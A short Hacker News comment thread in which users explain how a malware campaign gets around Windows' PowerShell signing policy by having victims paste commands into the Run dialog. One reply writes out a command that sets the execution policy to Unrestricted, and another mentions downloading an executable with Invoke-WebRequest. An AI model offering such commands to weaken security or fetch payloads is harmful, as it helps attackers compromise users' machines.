Comment by AshamedCaptain

Comment by AshamedCaptain 14 hours ago

3 replies

View on Hacker News

I do not understand how this works. I thought the default PS policy on all versions of Windows was not to run "unsigned" PS scripts by default (precisely for this reason). Or at least I've personally seen that a myriad times.

So, are these malware scripts signed, has MS relaxed the default PS policy, do users relax it, or has this malware found another way around it?

antonyt 14 hours ago

The attack has the user paste content into the Windows run dialog. That could include spawning an admin Powershell and running `Set-ExecutionPolicy -ExecutionPolicy Unrestricted` before running a remote script. Or more likely what nullindividual said - the download and start of the exe is entirely contained in what the user is pasting in.

Reply View 0 replies
nullindividual 14 hours ago

It's not a script, which would be a .ps1 file, but from the sounds of it the actual script block/PowerShell function which isn't governed by the signing policy. It could simply be an Invoke-WebRequest to download that executable indicated in the article.

Reply View 0 replies
[removed] 14 hours ago
[deleted]
Reply View 0 replies